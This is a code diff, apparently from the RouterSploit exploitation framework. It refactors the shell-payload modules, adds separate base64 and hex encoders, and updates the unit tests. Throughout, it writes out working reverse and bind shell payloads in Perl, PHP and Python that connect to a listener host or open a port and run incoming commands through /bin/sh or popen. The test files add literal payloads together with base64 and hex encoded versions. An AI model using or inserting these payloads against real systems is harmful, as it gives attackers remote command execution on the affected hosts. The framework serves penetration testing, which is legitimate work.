"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" + "if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" +
self.lhost + self.lhost +
...@@ -20,6 +28,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -20,6 +28,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
str(self.lport) + str(self.lport) +
"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};" "\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "use MIME::Base64;eval(decode_base64('{}'));".format(encoded_payload)
routersploit/modules/payloads/php/bind_tcp.py
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
BindTCPPayloadMixin,
)
from routersploit.modules.encoders.php.base64 import Encoder
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "PHP Bind TCP", "name": "PHP Bind TCP",
"description": "Creates interactive tcp bind shell by using php.", "description": "Creates interactive tcp bind shell by using php.",
...@@ -12,8 +17,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -12,8 +17,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PHP
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" + "$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
"socket_bind($s,\"0.0.0.0\",{});".format(self.rport) + "socket_bind($s,\"0.0.0.0\",{});".format(self.rport) +
"socket_listen($s,1);" + "socket_listen($s,1);" +
...@@ -27,6 +35,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -27,6 +35,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"socket_write($cl,$m,strlen($m));" + "socket_write($cl,$m,strlen($m));" +
"}}" "}}"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "eval(base64_decode('{}'));".format(encoded_payload)
routersploit/modules/payloads/php/reverse_tcp.py
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.php.base64 import Encoder
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "PHP Reverse TCP", "name": "PHP Reverse TCP",
"description": "Creates interactive tcp reverse shell by using php.", "description": "Creates interactive tcp reverse shell by using php.",
...@@ -11,11 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -11,11 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PHP
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"$s=fsockopen(\"tcp://{}\",{});".format(self.lhost, self.lport) + "$s=fsockopen(\"tcp://{}\",{});".format(self.lhost, self.lport) +
"while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}" "while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "eval(base64_decode('{}'));".format(encoded_payload)
routersploit/modules/payloads/python/bind_tcp.py
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
BindTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Python Bind TCP", "name": "Python Bind TCP",
"description": "Creates interactive tcp bind shell by using python.", "description": "Creates interactive tcp bind shell by using python.",
...@@ -11,8 +16,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -11,8 +16,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"import socket,os\n" + "import socket,os\n" +
"so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"so.bind(('0.0.0.0',{}))\n".format(self.rport) + "so.bind(('0.0.0.0',{}))\n".format(self.rport) +
...@@ -25,6 +33,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -25,6 +33,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"\tstdout_value=stdout.read()+stderr.read()\n" + "\tstdout_value=stdout.read()+stderr.read()\n" +
"\tso.send(stdout_value)\n" "\tso.send(stdout_value)\n"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
routersploit/modules/payloads/python/bind_udp.py
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
BindTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder
class Exploit(BindTCPPayloadMixin, GenericPayload): class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Python Bind UDP", "name": "Python Bind UDP",
"description": "Creates interactive udp bind shell by using python.", "description": "Creates interactive udp bind shell by using python.",
...@@ -12,8 +17,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -12,8 +17,11 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"from subprocess import Popen,PIPE\n" + "from subprocess import Popen,PIPE\n" +
"from socket import socket, AF_INET, SOCK_DGRAM\n" + "from socket import socket, AF_INET, SOCK_DGRAM\n" +
"s=socket(AF_INET,SOCK_DGRAM)\n" + "s=socket(AF_INET,SOCK_DGRAM)\n" +
...@@ -23,6 +31,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload): ...@@ -23,6 +31,3 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" + "\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" +
"\ts.sendto(''.join([out[0],out[1]]),addr)\n" "\ts.sendto(''.join([out[0],out[1]]),addr)\n"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
routersploit/modules/payloads/python/reverse_tcp.py
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Python Reverse TCP", "name": "Python Reverse TCP",
"description": "Creates interactive tcp reverse shell by using python.", "description": "Creates interactive tcp reverse shell by using python.",
...@@ -11,8 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -11,8 +16,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"import socket,subprocess,os\n" + "import socket,subprocess,os\n" +
"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"s.connect(('{}',{}))\n".format(self.lhost, self.lport) + "s.connect(('{}',{}))\n".format(self.lhost, self.lport) +
...@@ -21,6 +29,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -21,6 +29,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"os.dup2(s.fileno(),2)\n" + "os.dup2(s.fileno(),2)\n" +
"p=subprocess.call([\"/bin/sh\",\"-i\"])" "p=subprocess.call([\"/bin/sh\",\"-i\"])"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
routersploit/modules/payloads/python/reverse_udp.py
from base64 import b64encode from routersploit.core.exploit.option import OptString
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin from routersploit.core.exploit.payloads import (
GenericPayload,
Architectures,
ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder
class Exploit(ReverseTCPPayloadMixin, GenericPayload): class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = { __info__ = {
"name": "Python Reverse UDP", "name": "Python Reverse UDP",
"description": "Creates interactive udp reverse shell by using python.", "description": "Creates interactive udp reverse shell by using python.",
...@@ -12,8 +17,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -12,8 +17,11 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
), ),
} }
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self): def generate(self):
payload = ( return (
"import os\n" + "import os\n" +
"import pty\n" + "import pty\n" +
"import socket\n" + "import socket\n" +
...@@ -25,6 +33,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload): ...@@ -25,6 +33,3 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"pty.spawn('/bin/sh');\n" + "pty.spawn('/bin/sh');\n" +
"s.close()\n" "s.close()\n"
) )
encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8")
return "exec('{}'.decode('base64'))".format(encoded_payload)
routersploit/modules/payloads/x64/bind_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "X64 Bind TCP", "name": "X64 Bind TCP",
"description": "Creates interactive tcp bind shell for X64 architecture.", "description": "Creates interactive tcp bind shell for X64 architecture.",
......
routersploit/modules/payloads/x64/reverse_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "X64 Reverse TCP", "name": "X64 Reverse TCP",
"description": "Creates interactive tcp reverse shell for X64 architecture.", "description": "Creates interactive tcp reverse shell for X64 architecture.",
......
routersploit/modules/payloads/x86/bind_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "X86 Bind TCP", "name": "X86 Bind TCP",
"description": "Creates interactive tcp bind shell for X86 architecture.", "description": "Creates interactive tcp bind shell for X86 architecture.",
......
routersploit/modules/payloads/x86/reverse_tcp.py
...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import ( ...@@ -6,7 +6,7 @@ from routersploit.core.exploit.payloads import (
) )
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = { __info__ = {
"name": "X86 Reverse TCP", "name": "X86 Reverse TCP",
"description": "Creates interactive tcp reverse shell for X86 architecture.", "description": "Creates interactive tcp reverse shell for X86 architecture.",
......
tests/encoders/perl/test_base64.py 0 → 100644
from routersploit.modules.encoders.perl.base64 import Encoder
# perl bind tcp payload with rport=4321
bind_tcp = (
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," +
"4321" +
",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" +
"if($_=~ /(.*)/){system $1;}};"
)
# perl bind tcp payload with rport=4321 encoded with perl/base64
bind_tcp_encoded = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));"
)
def test_payload_encoding():
""" Test scenario - payload encoding """
encoder = Encoder()
assert encoder.encode(bind_tcp) == bind_tcp_encoded
tests/encoders/php/test_base64.py 0 → 100644
from routersploit.modules.encoders.php.base64 import Encoder
# php bind tcp payload with rport 4321
bind_tcp = (
"$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
"socket_bind($s,\"0.0.0.0\",4321);" +
"socket_listen($s,1);" +
"$cl=socket_accept($s);" +
"while(1){" +
"if(!socket_write($cl,\"$ \",2))exit;" +
"$in=socket_read($cl,100);" +
"$cmd=popen(\"$in\",\"r\");" +
"while(!feof($cmd)){" +
"$m=fgetc($cmd);" +
"socket_write($cl,$m,strlen($m));" +
"}}"
)
# php bind tcp payload with rport=4321 encoded with php/base64
bind_tcp_encoded = (
"eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));"
)
def test_payload_encoding():
""" Test scenario - payload encoding """
encoder = Encoder()
assert encoder.encode(bind_tcp) == bind_tcp_encoded
tests/encoders/php/test_hex.py 0 → 100644
from routersploit.modules.encoders.php.hex import Encoder
# php bind tcp payload with rport 4321
bind_tcp = (
"$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
"socket_bind($s,\"0.0.0.0\",4321);" +
"socket_listen($s,1);" +
"$cl=socket_accept($s);" +
"while(1){" +
"if(!socket_write($cl,\"$ \",2))exit;" +
"$in=socket_read($cl,100);" +
"$cmd=popen(\"$in\",\"r\");" +
"while(!feof($cmd)){" +
"$m=fgetc($cmd);" +
"socket_write($cl,$m,strlen($m));" +
"}}"
)
# php bind tcp payload with rport=4321 encoded with php/hex
bind_tcp_encoded = (
"eval(hex2bin('24733d736f636b65745f6372656174652841465f494e45542c534f434b5f53545245414d2c534f4c5f544350293b736f636b65745f62696e642824732c22302e302e302e30222c34333231293b736f636b65745f6c697374656e2824732c31293b24636c3d736f636b65745f616363657074282473293b7768696c652831297b69662821736f636b65745f77726974652824636c2c222420222c322929657869743b24696e3d736f636b65745f726561642824636c2c313030293b24636d643d706f70656e282224696e222c227222293b7768696c65282166656f662824636d6429297b246d3d66676574632824636d64293b736f636b65745f77726974652824636c2c246d2c7374726c656e28246d29293b7d7d'));"
)
def test_payload_encoding():
""" Test scenario - payload encoding """
encoder = Encoder()
assert encoder.encode(bind_tcp) == bind_tcp_encoded
tests/encoders/python/test_base64.py 0 → 100644
from routersploit.modules.encoders.python.base64 import Encoder
# python bind tcp payload with rport=4321
bind_tcp = (
"import socket,os\n" +
"so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"so.bind(('0.0.0.0',4321))\n" +
"so.listen(1)\n" +
"so,addr=so.accept()\n" +
"x=False\n" +
"while not x:\n" +
"\tdata=so.recv(1024)\n" +
"\tstdin,stdout,stderr,=os.popen3(data)\n" +
"\tstdout_value=stdout.read()+stderr.read()\n" +
"\tso.send(stdout_value)\n"
)
# python bind tcp payload with rport=4321 encoded with python/base64
bind_tcp_encoded = (
"exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))"
)
def test_payload_enconding():
""" Test scenario - payload encoding """
encoder = Encoder()
assert encoder.encode(bind_tcp) == bind_tcp_encoded
tests/payloads/armle/test_bind_tcp.py
from routersploit.modules.payloads.armle.bind_tcp import Exploit from routersploit.modules.payloads.armle.bind_tcp import Payload
# armle bind tcp payload with rport=4321 # armle bind tcp payload with rport=4321
...@@ -54,7 +54,7 @@ elf_armle_bind_tcp = ( ...@@ -54,7 +54,7 @@ elf_armle_bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
......
tests/payloads/armle/test_reverse_tcp.py
from routersploit.modules.payloads.armle.reverse_tcp import Exploit from routersploit.modules.payloads.armle.reverse_tcp import Payload
# armle reverse tcp with lhost=192.168.1.4 lport=4321 # armle reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -29,7 +29,7 @@ elf_armle_reverse_tcp = ( ...@@ -29,7 +29,7 @@ elf_armle_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
......
tests/payloads/cmd/test_awk_bind_tcp.py
from routersploit.modules.payloads.cmd.awk_bind_tcp import Exploit from routersploit.modules.payloads.cmd.awk_bind_tcp import Payload
# awk bind tcp payload with rport=4321 # awk bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
tests/payloads/cmd/test_awk_bind_udp.py
from routersploit.modules.payloads.cmd.awk_bind_udp import Exploit from routersploit.modules.payloads.cmd.awk_bind_udp import Payload
# awk bind udp payload with rport=4321 # awk bind udp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_udp = ( ...@@ -10,7 +10,7 @@ bind_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_udp assert payload.run() == bind_udp
tests/payloads/cmd/test_awk_reverse_tcp.py
from routersploit.modules.payloads.cmd.awk_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.awk_reverse_tcp import Payload
# awk reverse tcp payload with lhost=192.168.1.4 lport=4321 # awk reverse tcp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
tests/payloads/cmd/test_bash_reverse_tcp.py
from routersploit.modules.payloads.cmd.bash_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.bash_reverse_tcp import Payload
# bash reverse tcp payload with lhost=192.168.1.4 lport=4321 # bash reverse tcp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
tests/payloads/cmd/test_netcat_bind_tcp.py
from routersploit.modules.payloads.cmd.netcat_bind_tcp import Exploit from routersploit.modules.payloads.cmd.netcat_bind_tcp import Payload
# netcat bind tcp payload with rport=4321 # netcat bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
tests/payloads/cmd/test_netcat_reverse_tcp.py
from routersploit.modules.payloads.cmd.netcat_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.netcat_reverse_tcp import Payload
# netcat reverse tcp payload with lhost=192.168.1.4 lport=4321 # netcat reverse tcp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
tests/payloads/cmd/test_perl_bind_tcp.py
from routersploit.modules.payloads.cmd.perl_bind_tcp import Exploit from routersploit.modules.payloads.cmd.perl_bind_tcp import Payload
# perl bind tcp payload with rport=4321 # perl bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
tests/payloads/cmd/test_perl_reverse_tcp.py
from routersploit.modules.payloads.cmd.perl_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.perl_reverse_tcp import Payload
# perl reverse udp payload with lhost=192.168.1.4 lport=4321 # perl reverse udp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
tests/payloads/cmd/test_php_bind_tcp.py
from routersploit.modules.payloads.cmd.php_bind_tcp import Exploit from routersploit.modules.payloads.cmd.php_bind_tcp import Payload
# php bind tcp payload with rport=4321 # php bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
tests/payloads/cmd/test_php_reverse_tcp.py
from routersploit.modules.payloads.cmd.php_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.php_reverse_tcp import Payload
# php reverse udp payload with lhost=192.168.1.4 lport=4321 # php reverse udp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
tests/payloads/cmd/test_python_bind_tcp.py
from routersploit.modules.payloads.cmd.python_bind_tcp import Exploit from routersploit.modules.payloads.cmd.python_bind_tcp import Payload
# python bind tcp payload with rport=4321 # python bind tcp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_tcp = ( ...@@ -10,7 +10,7 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.run() == bind_tcp
tests/payloads/cmd/test_python_bind_udp.py
from routersploit.modules.payloads.cmd.python_bind_udp import Exploit from routersploit.modules.payloads.cmd.python_bind_udp import Payload
# python bind udp payload with rport=4321 # python bind udp payload with rport=4321
...@@ -10,7 +10,7 @@ bind_udp = ( ...@@ -10,7 +10,7 @@ bind_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_udp assert payload.run() == bind_udp
tests/payloads/cmd/test_python_reverse_tcp.py
from routersploit.modules.payloads.cmd.python_reverse_tcp import Exploit from routersploit.modules.payloads.cmd.python_reverse_tcp import Payload
# python reverse tcp payload with lhost=192.168.1.4 lport=4321 # python reverse tcp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_tcp = ( ...@@ -10,8 +10,8 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.run() == reverse_tcp
tests/payloads/cmd/test_python_reverse_udp.py
from routersploit.modules.payloads.cmd.python_reverse_udp import Exploit from routersploit.modules.payloads.cmd.python_reverse_udp import Payload
# python reverse udp payload with lhost=192.168.1.4 lport=4321 # python reverse udp payload with lhost=192.168.1.4 lport=4321
...@@ -10,8 +10,8 @@ reverse_udp = ( ...@@ -10,8 +10,8 @@ reverse_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_udp assert payload.run() == reverse_udp
tests/payloads/mipsbe/test_bind_tcp.py
from routersploit.modules.payloads.mipsbe.bind_tcp import Exploit from routersploit.modules.payloads.mipsbe.bind_tcp import Payload
# mipsbe bind tcp payload with rport=4321 # mipsbe bind tcp payload with rport=4321
...@@ -51,7 +51,7 @@ elf_mipsbe_bind_tcp = ( ...@@ -51,7 +51,7 @@ elf_mipsbe_bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
......
tests/payloads/mipsbe/test_reverse_tcp.py
from routersploit.modules.payloads.mipsbe.reverse_tcp import Exploit from routersploit.modules.payloads.mipsbe.reverse_tcp import Payload
# mipsbe reverse tcp with lhost=192.168.1.4 lport=4321 # mipsbe reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -46,7 +46,7 @@ elf_mipsbe_reverse_tcp = ( ...@@ -46,7 +46,7 @@ elf_mipsbe_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
......
tests/payloads/mipsle/test_bind_tcp.py
from routersploit.modules.payloads.mipsle.bind_tcp import Exploit from routersploit.modules.payloads.mipsle.bind_tcp import Payload
